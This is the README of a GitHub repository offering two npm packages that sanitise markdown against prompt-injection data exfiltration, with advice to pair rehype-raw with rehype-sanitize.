Skip to content

vercel-labs/markdown-sanitizers

Repository files navigation

Markdown sanitizers

This repository contains 2 related npm packages concerned with hardening markdown against data exfiltration attacks through LLM prompt-injection.

The 2 projects which address 2 different use cases:

  1. You render the markdown to HTML yourself
  2. You're giving the markdown to a third-party such as GitHub or GitLab where you don't control the rendering

You render the markdown to HTML yourself

This is the more common use-case. It's also the variant that is easier to secure, because you have full control over the process. harden-react-markdown is a wrapper for the popular react-markdown package giving it more secure defaults, and giving you the ability to allow-list URL prefixes in images and links.

2. You're giving the markdown to a third-party such as GitHub or GitLab where you don't control the rendering

We created markdown-to-markdown-sanitizer for this use-case. Generally speaking, this is less secure than sanitizing the final rendered output such as the generated HTML. Hence, this package should only be used when the markdown is rendered by a third-party such as GitHub or GitLab.

Security properties

The packages in this repository have subtle security properties. Use at your own risk (see LICENSE) and perform your own security testing for specific application.

⚠️ Important: Use rehype-sanitize if using rehype-raw

If you use rehype-raw or any plugin that allows embedded raw HTML, you must pair it with a sanitizer such as [rehype-sanitize](https://github.com/rehypejs/rehype-sanitize).

While harden-react-markdown and related packages harden URLs inside markdown nodes, raw HTML injected via rehype-raw bypasses this layer — meaning untrusted HTML could still introduce data-exfiltration or XSS vectors.

Recommended setup:

import rehypeRaw from "rehype-raw";
import rehypeSanitize from "rehype-sanitize";

const plugins = [
  rehypeRaw,
  rehypeSanitize, // must come after rehype-raw
];

Always sanitize after parsing raw HTML 🚫 Never assume LLM or user-generated markdown is safe by default.